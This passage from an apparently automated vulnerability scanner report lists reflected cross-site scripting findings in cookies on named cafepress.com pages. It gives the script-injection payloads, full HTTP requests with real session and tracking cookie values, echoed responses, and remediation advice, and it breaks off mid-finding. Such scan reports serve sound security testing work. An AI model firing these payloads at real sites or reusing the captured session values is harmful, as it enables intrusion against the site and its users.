HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 71920 Date: Sun, 26 Dec 2010 13:47:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71920 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '73b12</script><script>alert(1)</script>ef50e1d8ced ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-ornaments
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac27"-alert(1)-"47b4bca4067 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 54274 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA5ac27"-alert(1)-"47b4bca4067 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.129. http://www.cafepress.com/make/personalized-ornaments [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/personalized-ornaments
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d007</script><script>alert(1)</script>1409bed2e4a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=4d007</script><script>alert(1)</script>1409bed2e4a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 54293 Date: Sun, 26 Dec 2010 13:48:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54293 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '4d007</script><script>alert(1)</script>1409bed2e4a ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.130. http://www.cafepress.com/make/photo-on-canvas [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/photo-on-canvas
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 390f6"-alert(1)-"cf485b1a7be was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/photo-on-canvas HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 64044 Date: Sun, 26 Dec 2010 13:47:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 64044 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA390f6"-alert(1)-"cf485b1a7be "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.131. http://www.cafepress.com/make/photo-on-canvas [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/photo-on-canvas
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa097</script><script>alert(1)</script>ac2f65e7c84 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/photo-on-canvas HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=aa097</script><script>alert(1)</script>ac2f65e7c84 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 63812 Date: Sun, 26 Dec 2010 13:47:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'aa097</script><script>alert(1)</script>ac2f65e7c84 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.132. http://www.cafepress.com/sk/TheGamingApe [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/sk/TheGamingApe
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ba9"-alert(1)-"3e702ef6992 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 174586 Date: Sun, 26 Dec 2010 13:49:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174586 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb9ba9"-alert(1)-"3e702ef6992 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.133. http://www.cafepress.com/sk/TheGamingApe [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/sk/TheGamingApe
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 622eb</script><script>alert(1)</script>7a1f01045b0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
